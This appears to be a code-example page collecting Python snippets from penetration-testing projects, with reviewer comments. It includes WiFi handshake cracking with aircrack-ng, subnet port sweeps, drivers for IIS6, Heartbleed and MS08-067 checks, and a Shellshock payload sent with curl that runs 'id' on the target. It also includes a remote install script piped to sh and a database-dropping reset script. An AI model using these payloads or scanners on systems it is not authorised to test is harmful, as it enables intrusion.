예제 #1
파일: xwifi.py 프로젝트: shuixi2013/xwifi
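def worker2():
    """Poll the capture files until aircrack-ng stops reporting "no data".

    Every 10 seconds aircrack-ng is run over ``/tmp/*.cap`` for the
    module-level ``bssid`` and its output is saved to
    ``/tmp/xwifiresult.txt``. While that output is empty or contains
    "no data" / "No valid", the running ``airport ... sniff`` process is
    killed, the capture files are deleted and ``worker1`` is started again
    in a new process. Once the output looks different, the sniffer is killed
    one last time and the function returns.

    NOTE(review): ``bssid`` is interpolated unquoted into a shell command and
    all intermediate files use fixed names under /tmp; confirm where ``bssid``
    comes from before reusing this pattern.
    """
    # Raw string: the value is unchanged, but the regex escapes (\d, \s, \S,
    # \.) no longer rely on Python keeping unknown escape sequences as-is.
    find_sniffer_cmd = (
        r"ps -a | ack '\d+(?=\s+\S+\s+\d+:\d+\.\d+\sairport.*sniff)' -o")

    def stop_sniffer():
        # Look up the PID of the airport sniff process and kill it.
        sniffPID = get_string_from_command(find_sniffer_cmd)
        os.system("kill %s" % sniffPID)

    while True:
        # Check every 10 seconds (the original comment said 60 s, but the
        # code has always slept for 10).
        time.sleep(10)
        os.system(
            "aircrack-ng -w /tmp/forhandshakedict.txt -b %s /tmp/*.cap | tee /tmp/xwifiresult.txt"
            % bssid)
        with open("/tmp/xwifiresult.txt", "r+") as f:
            content = f.read()
        if not (re.search(r"(no data)|(No valid)", content, re.I)
                or content == ""):
            break
        print(
            "I am sniffing a handshake but no one logins the wifi,so you have to wait,keep me running..."
        )

        stop_sniffer()
        os.system("rm /tmp/*.cap")
        p1 = Process(target=worker1, args=())
        p1.start()
        # Deliberately not joined: join() would block here and the loop
        # would never reach its next check.
    stop_sniffer()
    print("Congratulations! Got handshake!")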
예제 #2
파일: xcdn.py 프로젝트: 3xp10it/xcdn
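 def domain_has_cdn(self):
     """Guess whether ``self.domain`` sits behind a CDN.

     Returns a dict with two 0/1 flags:
     ``{'has_cdn': 1, 'is_cloud_flare': 1}`` when the NS records mention
     cloudflare, ``{'has_cdn': 1, 'is_cloud_flare': 0}`` when they match
     another CDN keyword or the domain has more than one A record, and
     ``{'has_cdn': 0, 'is_cloud_flare': 0}`` otherwise.

     The keyword match is a loose substring heuristic ("cloud", "fast",
     "cdn", ...), so unrelated name servers can match it.
     """
     import re
     import shlex
     CLIOutput().good_print("现在检测domain:%s是否有cdn" % self.domain)
     # NS records (like MX records) are looked up on the registered domain,
     # e.g. `dig +short baidu.com ns` rather than `dig +short www.baidu.com ns`.
     # The domain is shell-quoted because the helper takes a command string.
     result = get_string_from_command(
         "dig ns %s +short" % shlex.quote(get_root_domain(self.domain)))
     pattern = re.compile(
         r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)",
         re.I)
     cloudflare_pattern = re.compile(r"cloudflare", re.I)
     if pattern.search(result):
         if cloudflare_pattern.search(result):
             print("has_cdn=1 from ns,and cdn is cloudflare")
             return {'has_cdn': 1, 'is_cloud_flare': 1}
         print("has_cdn=1 from ns")
         return {'has_cdn': 1, 'is_cloud_flare': 0}
     # Fallback: more than one A record is treated as a sign of a CDN.
     result = get_string_from_command(
         "dig a %s +short" % shlex.quote(self.domain))
     a_records = re.findall(r"((\d{1,3}\.){3}\d{1,3})", result)
     if len(a_records) > 1:
         return {'has_cdn': 1, 'is_cloud_flare': 0}
     return {'has_cdn': 0, 'is_cloud_flare': 0}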
예제 #3
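 def get_c_80_or_443_list(self, ip):
     """List the addresses nmap prints when scanning ``ip``'s /24 for ``self.port``.

     Returns a de-duplicated list of dotted-quad strings found in the nmap
     output, or ``0`` (not an empty list) when the ``nmap`` command is not
     available; callers have to handle both shapes.

     nmap is started from an argument list rather than a shell string, so
     ``ip`` and ``self.port`` can no longer be interpreted by a shell.
     NOTE(review): a value beginning with "-" would still be read by nmap as
     an option; validate ``ip`` at the caller if it can come from outside.
     """
     if "not found" in get_string_from_command("nmap"):
         print("[-]需要安装nmap命令")
         return 0
     scanPort = self.port
     print("[*]现在进行 %s 的c段开了 %s 端口机器的扫描" % (ip, scanPort))
     nmap_argv = [
         "nmap", "-p", str(scanPort), "-sS", "-sV", "-T4", "-v", "-n",
         "--min-hostgroup", "4", "--min-parallelism", "1024",
         "--host-timeout", "30", "-Pn", "--open", "%s/24" % ip,
     ]
     popen = subprocess.Popen(nmap_argv,
                              stdout=subprocess.PIPE,
                              close_fds=True)
     result, _ = popen.communicate()
     result = result.decode("utf-8", "ignore")
     # Every dotted quad in the output is collected; the set removes the
     # duplicates that the verbose (-v) output produces.
     allIP = re.findall(r"((\d{1,3}\.){3}\d{1,3})", result)
     return list({each[0] for each in allIP})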
예제 #4
파일: xcdn.py 프로젝트: ziqi521/xcdn
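 def get_ip_from_mx_record(self):
     """Resolve the MX hosts that share ``self.domain``'s root domain.

     Runs ``dig <root> +short mx``, keeps the MX host names that end in the
     root domain, resolves each one and returns the first address of every
     host, without duplicates. Hosts that do not resolve are skipped.
     """
     import shlex
     import socket
     from exp10it import get_root_domain
     from exp10it import get_string_from_command
     print("尝试从mx记录中找和%s顶级域名相同的mx主机" % self.domain)
     # self.domain looks like www.baidu.com; MX is queried on the root domain.
     root_domain = get_root_domain(self.domain)
     result = get_string_from_command(
         "dig %s +short mx" % shlex.quote(root_domain))
     # re.escape replaces the hand-written "." escaping, which depended on an
     # invalid string escape and left other regex metacharacters unescaped.
     sub_domains_list = re.findall(
         r"\d{1,} (.*\.%s)\." % re.escape(root_domain), result)
     ip_list = []
     for each in sub_domains_list:
         print(each)
         try:
             ip = socket.gethostbyname_ex(each)[2]
         except (socket.gaierror, socket.herror):
             # One unresolvable MX host should not abort the whole lookup.
             continue
         if ip and ip[0] not in ip_list:
             ip_list.append(ip[0])
     return ip_list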
예제 #5
파일: xcdn.py 프로젝트: ziqi521/xcdn
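 def get_c_80_or_443_list(self,ip):
     """List the addresses masscan prints for port 80 or 443 on ``ip``'s /24.

     The port follows ``self.http_or_https`` ("http" -> 80, "https" -> 443);
     any other value raises ValueError instead of failing later on an
     unassigned ``scanPort``. Returns the dotted-quad strings found in
     masscan's standard output, in output order.

     masscan's output is read from a pipe instead of being redirected to
     ``/tmp/masscan.out``: a fixed file name in a world-writable directory can
     be pre-created or symlinked by another local user, and scanners of this
     kind are commonly run with elevated privileges.
     NOTE(review): ``/tmp/masscan.out`` is therefore no longer written;
     confirm nothing else reads it.
     """
     import re
     import subprocess
     if "not found" in get_string_from_command("masscan"):
         # masscan is used here because nmap results were judged inaccurate.
         # NOTE(review): installing a package as a side effect of a scan call
         # is surprising; consider failing with a message instead.
         os.system("apt-get install masscan")
     port_by_scheme = {"http": 80, "https": 443}
     if self.http_or_https not in port_by_scheme:
         raise ValueError(
             "http_or_https must be 'http' or 'https', got %r" %
             (self.http_or_https,))
     scanPort = port_by_scheme[self.http_or_https]
     CLIOutput().good_print("现在进行%s的c段开了%d端口机器的扫描" % (ip, scanPort))
     try:
         completed = subprocess.run(
             ["masscan", "-p%d" % scanPort, "%s/24" % ip],
             stdout=subprocess.PIPE)
         strings = completed.stdout.decode("utf-8", "ignore")
     except FileNotFoundError:
         # masscan is still missing: behave like an empty result.
         strings = ""
     allIP=re.findall(r"((\d{1,3}\.){3}\d{1,3})",strings)
     ipList=[each[0] for each in allIP]
     print(ipList)
     return ipList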
예제 #6
파일: iis.py 프로젝트: XTpeeps/exploit-fix
import sys
from exp10it import COMMON_NOT_WEB_PORT_LIST

from exploit import get_target_open_port_list

# Driver script: for each open port of the target that is not in
# COMMON_NOT_WEB_PORT_LIST, run the bundled iis6.py check when the server
# banner mentions IIS/6 and append any hit to result.txt beside this script.
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking iis vul for " + target)
# Last path segment of the argument; a URL ending in "/" yields "".
domain = target.split("/")[-1]

open_port_list = get_target_open_port_list(target)
for each_port in open_port_list:
    if each_port not in COMMON_NOT_WEB_PORT_LIST:
        # NOTE(review): the banner lookup does not depend on each_port but is
        # repeated on every iteration.
        server_type = get_server_type(target)
        if not re.search(r"iis/6", server_type, re.I):
            continue
        # NOTE(review): domain comes straight from sys.argv and is placed
        # unquoted into a shell command line; shell metacharacters in the
        # argument would be executed on the machine running this script.
        a = get_string_from_command("cd %s && python2 iis6.py %s %s" %
                                    (current_dir, domain, each_port))
        if re.search(r"HHIT CVE-2017-7269 Success", a, re.I):
            string_to_write = "Congratulations! 存在iis6.0远程溢出漏洞:\n%s:%s" % (
                domain, each_port)

            # NOTE(review): good_print is called on the class, not on an
            # instance -- confirm it can be used that way.
            CLIOutput.good_print(string_to_write)
            with open("%s/result.txt" % current_dir, "a+") as f:
                f.write(string_to_write)

        else:
            # NOTE(review): this message is printed whenever the success
            # marker is absent from the helper's output; its wording about
            # missing nmap results does not follow from that condition.
            print(
                "coz I found no nmap scan result from database,I will test only on the default port but not test on all open ports"
            )
예제 #7
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list

# Driver script: run the bundled ssltest.py against every open port of the
# target that is not in COMMON_NOT_WEB_PORT_LIST and append any hit to
# result.txt beside this script.
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking heartbleed vul for " + target)
open_port_list = get_target_open_port_list(target)
# http_domain and target_table_name are assigned but not used below.
http_domain = get_http_domain_from_url(target)
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]
parsed = urlparse(target)
# Second, identical lookup; it replaces the list obtained above.
open_port_list = get_target_open_port_list(target)
if ":" in parsed.netloc:
    # Adds the explicit port from the URL as a string.
    # NOTE(review): splitting netloc on ":" misreads user:pass@host and IPv6
    # literals; urlparse(target).port would be the safer source -- confirm.
    open_port_list.append(parsed.netloc.split(":")[1])

for each in open_port_list:
    if each not in COMMON_NOT_WEB_PORT_LIST:
        # NOTE(review): hostname and port are derived from sys.argv and placed
        # unquoted into a shell command line.
        a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " %
                                    (current_dir, each, hostname))
        if re.search(r"server is vulnerable", a, re.I):
            string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
                hostname, each)
            CLIOutput().good_print(string_to_write)
            with open("%s/result.txt" % current_dir, "a+") as f:
                f.write(string_to_write)
        else:
            # NOTE(review): printed for every port where the marker is absent;
            # the wording about missing nmap results does not follow from
            # that condition.
            print(
                "coz I found no nmap scan result from database,I will not run heartbleed vul check module on other ports"
            )
예제 #8
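def buy_ipx():
    """Drive a headless PhantomJS browser through an Apple CN store checkout.

    Reads the module-level settings ``proxy_url``, ``cookie``, ``apple_id``,
    ``apple_id_pass``, ``try_index``, ``zhifubao_username`` and ``zhifumima``.
    Installs selenium / phantomjs when they are missing, signs in, opens the
    ``try_index``-th favourite, walks the checkout pages and confirms the
    Alipay payment. Returns nothing; progress is printed and screenshots are
    written to ``/tmp/PhantomJSPic3`` .. ``/tmp/PhantomJSPic6``.

    NOTE(review), security:
    * PhantomJS is started with ``--ignore-ssl-errors=true`` and
      ``--web-security=false`` while the Apple ID and the Alipay payment
      password are typed into pages, so a forged certificate would not stop
      the credentials from being submitted.
    * The screenshots of the payment pages go to fixed, predictable paths in
      /tmp.
    * Packages and the PhantomJS archive are fetched and installed at run
      time without any integrity check.
    """
    if module_exist("selenium") is False:
        os.system("pip3 install selenium")
    from selenium import webdriver
    result = get_string_from_command("phantomjs --help")
    if re.search(r"(not found)|(不是内部或外部命令)|(Unknown command)", result,re.I):
        if platform.system() == "Darwin":
            os.system("brew install phantomjs")
        elif platform.system() == 'Linux':
            os.system("echo y | apt-get install phantomjs")
        elif platform.system() == 'Windows':
            # The listing had "import wget --no-cache", which is not valid
            # Python; the module is simply named wget.
            import wget
            try:
                wget.download(
                    "https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-windows.zip", out="phantomjs.zip")
            except Exception:
                # Narrowed from a bare except so Ctrl-C still interrupts.
                print(
                    "Please download phantomjs from the official site and add the executeable file to your path")
                input("下载速度太慢,还是手工用迅雷下载吧,下载后将可执行文件phantomjs.exe存放到PATH中,再按任意键继续...")
    import time
    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions

    service_args_value = ['--ignore-ssl-errors=true',
                          '--ssl-protocol=any', '--web-security=false']
    if proxy_url != "" and proxy_url != 0:
        # proxy_url looks like "<type>://<host:port>".
        proxy_type = proxy_url.split(":")[0]
        proxy_value_with_type = proxy_url.split("/")[-1]
        service_args_value += ['--proxy=%s' % proxy_value_with_type,
                               '--proxy-type=%s' % proxy_type]
        service_args_value.append('--disk-cache=yes')  # enable the disk cache

    ua = "Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
    headers = {'User-Agent': '%s' % ua}
    if cookie!="":
        headers['Cookie'] = '%s' % cookie
    for key in headers:
        capability_key = 'phantomjs.page.custom_headers.{}'.format(key)
        webdriver.DesiredCapabilities.PHANTOMJS[capability_key] = headers[key]
    driver = webdriver.PhantomJS(service_args=service_args_value)

    driver.implicitly_wait(300)
    driver.set_page_load_timeout(300)

    def wait_clickable(by, value):
        # Block (up to 300 s) until the located element can be clicked.
        WebDriverWait(driver, 300).until(
            expected_conditions.element_to_be_clickable((by, value)))

    def sign_in(user, password):
        # Fill the Apple sign-in form and submit it.
        wait_clickable(By.NAME, 'login-apple_id')
        user_text_box=driver.find_element_by_name('login-apple_id')
        user_text_box.clear()
        user_text_box.send_keys(user)
        pass_text_box=driver.find_element_by_name('login-password')
        pass_text_box.clear()
        pass_text_box.send_keys(password)
        login_button=driver.find_element_by_id('sign-in')
        print("现在点击登录按钮")
        login_button.click()

    print("目前没有登录,现在访问收藏夹,尝试跳转到登录页面")
    driver.get("https://www.apple.com/cn/shop/favorites")
    sign_in(apple_id, apple_id_pass)

    print(driver.title)

    # Poll once a second until the favourites list has rendered.
    while True:
        pic_links=driver.find_elements_by_class_name('relatedlink')
        if pic_links:
            print(len(pic_links))
            break
        time.sleep(1)

    # try_index is 1-based; which entries are the wanted product depends on
    # the account's favourites list and has to be adjusted by hand.
    pic_links[try_index-1].click()

    wait_clickable(By.NAME, 'add-to-cart')
    driver.find_element_by_name('add-to-cart').click()
    print("现在加入到购物车")

    wait_clickable(By.ID, 'cart-actions-checkout')
    jie_zhang_link=driver.find_element_by_id('cart-actions-checkout')
    print("现在点击结帐")
    jie_zhang_link.click()

    # Checkout asks for the Apple ID again; 'xxx' are placeholders in the
    # listing.
    sign_in('xxx', 'xxx')
    driver.get_screenshot_as_file("/tmp/PhantomJSPic3")

    wait_clickable(By.ID, 'cart-continue-button')
    driver.find_element_by_id('cart-continue-button').click()
    driver.find_element_by_id('shipping-continue-button').click()

    wait_clickable(By.ID, 'payment-form-options-Alipay-0')
    driver.find_element_by_id('payment-form-options-Alipay-0').click()
    driver.find_element_by_id('payment-continue-button').click()

    # The remaining checkout pages are each one wait followed by one click.
    for element_id in ('invoice-next-step', 'terms-accept',
                       'terms-continue-button', 'place-order-button',
                       'pay_now'):
        wait_clickable(By.ID, element_id)
        driver.find_element_by_id(element_id).click()

    wait_clickable(By.ID, 'J_tLoginId')
    zhifubao_username_box=driver.find_element_by_id('J_tLoginId')
    zhifubao_username_box.click()
    zhifubao_username_box.clear()
    zhifubao_username_box.send_keys(zhifubao_username)

    zhifubao_pass_box=driver.find_element_by_id('pay_passwd_rsainput')
    zhifubao_pass_box.click()
    zhifubao_pass_box.send_keys(zhifumima)

    driver.get_screenshot_as_file("/tmp/PhantomJSPic4")
    os.system("open /tmp/PhantomJSPic4")

    time.sleep(3)

    print("现在在支付宝中确认付款")
    driver.get_screenshot_as_file("/tmp/PhantomJSPic5")
    driver.find_element_by_id('J_newBtn').click()

    os.system("open /tmp/PhantomJSPic5")

    WebDriverWait(driver, 300).until(
        expected_conditions.url_contains(
            'standard/lightpay/light_pay_cashier.htm'))

    tmp=driver.find_element_by_id('pay_password_rsainput')
    tmp.click()
    tmp.send_keys(zhifumima)

    driver.get_screenshot_as_file("/tmp/PhantomJSPic6")

    print("最后确认付款")
    tmp=driver.find_element_by_id('J_authSubmit')
    tmp.click()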
예제 #9
파일: 3xp10it.py 프로젝트: zero-mmx/3xp10it
#############################################################
### __ /        _ |   \_) |
###  _ \\ \ / _ \ | (  ||  _|
### ___/ _\_\.__/_|\__/_|\__|
###         _|
###
### name: 3xp10it.py
### function: exp10itScanner
### date: 2016-11-07
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
import re
import os
import time
# Upgrade exp10it from the package index before importing it.
# NOTE(review): this installs whatever version is newest at run time, with
# no version pin or hash check, every time the script starts.
os.system("pip3 install exp10it -U --no-cache-dir")
from exp10it import figlet2file
from exp10it import exp10itScanner
from exp10it import get_string_from_command
figlet2file("3xp10it", 0, True)
time.sleep(1)

# Install each system package that `apt list` does not mention.
for apt_package in ("python-requests", "python-dnspython"):
    a = get_string_from_command("apt list %s" % apt_package)
    if not re.search(apt_package, a, re.I):
        os.system("apt-get install %s" % apt_package)

exp10itScanner()
예제 #10
    "/cgi-bin/webmail.cgi",
]

# Driver script: probe every known *.cgi URL of the target with curl and
# record the URLs whose response contains "uid=".
target = sys.argv[1]
print("checking shellshock vul for " + target)
http_domain = get_http_domain_from_url(target)
# URLs previously stored for this target, plus the target itself.
urls = get_target_urls_from_db(target, "exp10itdb")
urls.append(target)

for each_url in urls:
    # Keep only the part before "^" (presumably a separator used by the
    # stored records -- confirm against the writer of the database).
    if "^" in each_url:
        each_url = each_url.split("^")[0]
    parsed = urlparse(each_url)
    # Query string and fragment are dropped.
    url = parsed.scheme + "://" + parsed.netloc + parsed.path
    if re.search(r"\.cgi$", url, re.I):
        # NOTE(review): url is placed between single quotes in a shell
        # command. The URLs come from the database and the command line, so a
        # stored URL containing a single quote would run arbitrary commands
        # on the machine executing this script.
        a = get_string_from_command(
            "curl '%s' -A '() { :; }; echo; echo `id`' -k" % url)
        if re.search(r"uid=", a, re.I):
            # NOTE(review): two %s placeholders but a single argument -- this
            # line raises TypeError instead of building the message.
            string_to_write = "Congratulations! shellshock vul exists on %s\n%s" % url
            CLIOutput().good_print(string_to_write)
            with open("%s/result.txt" % current_dir, "a+") as f:
                f.write(string_to_write)
        else:
            print("no shellshock vul")

# hostname is only assigned when the target starts with "http".
if target[:4] == "http":
    hostname = urlparse(target).hostname

target_table_name = get_target_table_name_list(target)[0]

open_port_list = get_target_open_port_list(target)
parsed = urlparse(target)
예제 #11
import os
import re
import requests
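# Upgrade exp10it from the package index before importing it.
# NOTE(review): unpinned, unverified upgrade on every run.
os.system("pip3 install exp10it -U")
from exp10it import get_string_from_command
from exp10it import get_request
sysinfo = get_string_from_command("uname -a")

# Install git; it is needed later to install vundle.
a=get_string_from_command("git help")
if re.search(r"(未找到命令)|(not found)|(unknown command)",a,re.I):
    # "debain" was a typo, so the apt branch only ever matched Ubuntu.
    if re.search(r"(ubuntu)|(debian)",sysinfo,re.I):
        os.system("apt-get install git")
    if re.search(r"darwin",sysinfo,re.I):
        os.system("brew install git")

# The list of registered login shells is consulted further down.
with open("/etc/shells", "r") as f:
    content = f.read()
pur = input("1.只更新配置文件\n2.安装zsh+vim+tmux+配置文件\n3.安装fish+vim+tmux+配置文件\ninput your choose here:>")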
if pur == '1':
    # Menu choice 1: nothing is installed in this branch.
    pass
elif pur == '2':
    # Make zsh the default shell, registering it in /etc/shells first if
    # it is not listed there yet.
    if not re.search(r"/bin/zsh", content, re.I):
        os.system('''echo "/bin/zsh" | sudo tee -a /etc/shells''')
    os.system("chsh -s `which zsh`")
    # Install oh-my-zsh.
    # NOTE(review): this downloads a script from the master branch and pipes
    # it straight into sh, so whatever that URL serves at run time is
    # executed without review or integrity check.
    os.system('''sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" && exit''')
    # The installer has to leave zsh afterwards, otherwise the remaining
    # steps cannot continue (unless someone presses ctrl+d by hand).

else:
예제 #12
파일: xwifi.py 프로젝트: shuixi2013/xwifi
# Tested on: macOS Sierra 10.12.5

import time
import os
# Upgrade exp10it from the package index before importing it.
# NOTE(review): unpinned, unverified upgrade on every run.
os.system("pip3 install exp10it -U --no-cache --retries 0")
from exp10it import figlet2file
figlet2file("xwifi", 0, True)
time.sleep(1)
from exp10it import get_string_from_command
from exp10it import get_all_file_name
from multiprocessing import Process
import re
import time
import sys
# Write a one-word wordlist to a fixed path under /tmp.
os.system("echo testfor_handshake > /tmp/forhandshakedict.txt")
# Each dependency check runs the command and looks for "not found" in its
# output.
a = get_string_from_command("ack")
if re.search(r"not found", a, re.I):
    input(
        "Please install ack first,eg.brew install ack,after you finished it,press anykey to continue."
    )

a = get_string_from_command("airport")
if re.search(r"not found", a, re.I):
    # Locate the airport binary under /System/Library and link it into
    # /usr/local/bin.
    a = get_string_from_command(
        '''find /System/Library -name "airport" | ack "^/.*/airport$"''')
    # NOTE(review): the command output is pasted unquoted into another shell
    # command; an empty result, several matches or a trailing newline would
    # change what ln receives.
    os.system("ln -s %s /usr/local/bin/airport" % a)
    #print("add your airport to path,then run me again.")
a = get_string_from_command("aircrack-ng")
if re.search(r"not found", a, re.I):
    input(
        "Please install aircrack-ng first,eg.brew install aircrack-ng,after you finished it,press anykey to continue."
예제 #13
page.open(server, 'post', data, function (status) {
    if (status !== 'success') {
        console.log('Unable to post!');
    } else {
        console.log(page.content);
    }
    phantom.exit();
});
    ''' % (qihao, ++i)
    while True:
        os.system("rm post.js")
        with open("post.js", "a+") as f:
            f.write(post_js_content)
        proxy_addr = get_random_proxy()
        print(proxy_addr)
        html = get_string_from_command("phantomjs post.js --proxy=%s" %
                                       proxy_addr)
        has_page_no = re.search(r"/(\d+)页", html)
        if has_page_no:
            break
        else:
            print("没有获取到页数,尝试再次获取...")
            continue

    page_no = has_page_no.group(1)
    print("期号:%s,页数:%s" % (qihao, page_no))
    page_list = []
    for page in range(1, int(page_no) + 1):
        page_list.append(str(page))

    def get_page_content(page):
        data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)
예제 #14
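 def domain_has_cdn(self):
     """Guess whether ``self.domain`` sits behind a CDN, using nslookup.

     Returns a dict with two 0/1 flags:
     ``{'has_cdn': 1, 'is_cloud_flare': 1}`` when the NS lookup output
     mentions cloudflare, ``{'has_cdn': 1, 'is_cloud_flare': 0}`` when it
     matches another CDN keyword or the A lookup prints more than one
     address, and ``{'has_cdn': 0, 'is_cloud_flare': 0}`` otherwise.

     Both regular expressions had been pasted fourteen times into one
     implicitly concatenated literal. For the keyword pattern that was only
     noise, but the cloudflare pattern then required the word fourteen times
     in a row, so ``is_cloud_flare`` could never be 1. Each pattern is now
     written once.

     NOTE(review): nslookup output normally also shows the resolver's own
     address, and the A-record count below includes every dotted quad in the
     output -- confirm the "more than one address" rule still means what it
     is meant to.
     """
     import re
     import shlex
     print("[*]现在检测domain:%s是否有cdn" % self.domain)
     # NS records (like MX records) are looked up on the registered domain,
     # e.g. baidu.com rather than www.baidu.com. An argument list keeps the
     # domain away from a shell.
     popen = subprocess.Popen(
         ["nslookup", "-type=ns", get_root_domain(self.domain)],
         stdout=subprocess.PIPE,
         close_fds=True)
     result, _ = popen.communicate()
     result = result.decode("utf-8", "ignore")
     pattern = re.compile(
         r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)",
         re.I)
     cloudflare_pattern = re.compile(r"cloudflare", re.I)
     if pattern.search(result):
         if cloudflare_pattern.search(result):
             print("has_cdn=1 from ns,and cdn is cloudflare")
             return {'has_cdn': 1, 'is_cloud_flare': 1}
         print("has_cdn=1 from ns")
         return {'has_cdn': 1, 'is_cloud_flare': 0}
     # Fallback: more than one address in the A lookup is treated as a CDN.
     # The helper takes a command string, so the domain is shell-quoted.
     result = get_string_from_command(
         "nslookup -type=a %s" % shlex.quote(self.domain))
     a_records = re.findall(r"((\d{1,3}\.){3}\d{1,3})", result)
     if len(a_records) > 1:
         return {'has_cdn': 1, 'is_cloud_flare': 0}
     return {'has_cdn': 0, 'is_cloud_flare': 0}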
예제 #15
# This debug.py is for developers. Do not run it if you only want to use 3xp10it rather than develop it.

import os
import re
import sys
# Prefer the development copy of exp10it in ~/mypypi over an installed one.
exp10it_module_path = "%s/mypypi" % os.path.expanduser("~")
sys.path.insert(0, exp10it_module_path)
from exp10it import execute_sql_in_db
from exp10it import get_string_from_command
from exp10it import CONFIG_INI_PATH
if not os.path.exists(CONFIG_INI_PATH):
    print("%s not exist" % CONFIG_INI_PATH)
else:
    db_name = "exp10itdb"
    a = input("1.删除config.ini和exp10itdb\n2....\n>")
    if a == '1':
        # Destructive reset: drops the whole database and removes the
        # configuration file. Start MySQL first if the client cannot connect.
        result = get_string_from_command("mysql")
        mysql_is_down = re.search(r"Can't connect", result, re.I)
        if mysql_is_down:
            os.system("service mysql start")
        execute_sql_in_db("drop database %s" % db_name)
        os.system("rm %s" % CONFIG_INI_PATH)
예제 #16
import os
import sys

exp10it_module_path = os.path.expanduser("~") + "/exp10it"
sys.path.insert(0, exp10it_module_path)

import re
import time
from urllib.parse import urlparse
from exp10it import get_string_from_command
from exp10it import CLIOutput
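# Driver script: run nmap's smb-vuln-ms08-067 check against the target and
# keep the log as result.txt beside this script when nmap reports VULNERABLE.
import shlex

target = sys.argv[1]
print("checking ms08-067 vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
# NOTE(review): a time-stamped name under /tmp is still guessable;
# tempfile.mkstemp would give a private file.
current_log_file = "/tmp/commix_" + str(time.time())
if target[:4] == "http":
    target = urlparse(target).hostname
# target comes from the command line: quote it (and the paths) so that the
# shell needed for the pipe to tee cannot interpret it.
cmd = "nmap --script=smb-vuln-ms08-067 %s 2>&1 | tee %s" % (
    shlex.quote(str(target)), shlex.quote(current_log_file))
a = get_string_from_command(cmd)
if re.search(r"VULNERABLE", a, re.I):
    os.system("mv %s %s/result.txt" %
              (shlex.quote(current_log_file), shlex.quote(current_dir)))
    # The message used to say MS10-010, but the check that ran is MS08-067.
    CLIOutput().good_print("Congratulations! MS08-067 exists on %s" % target)
else:
    os.system("rm %s" % shlex.quote(current_log_file))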
예제 #17
파일: xban.py 프로젝트: 3xp10it/mytools
page.open(server, 'post', data, function (status) {
    if (status !== 'success') {
        console.log('Unable to post!');
    } else {
        console.log(page.content);
    }
    phantom.exit();
});
    ''' % (qihao, ++i)
    while True:
        os.system("rm post.js")
        with open("post.js", "a+") as f:
            f.write(post_js_content)
        proxy_addr = get_random_proxy()
        print(proxy_addr)
        html = get_string_from_command(
            "phantomjs post.js --proxy=%s" % proxy_addr)
        has_page_no = re.search(r"/(\d+)页", html)
        if has_page_no:
            break
        else:
            print("没有获取到页数,尝试再次获取...")
            continue

    page_no = has_page_no.group(1)
    print("期号:%s,页数:%s" % (qihao, page_no))
    page_list = []
    for page in range(1, int(page_no) + 1):
        page_list.append(str(page))

    def get_page_content(page):
        data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)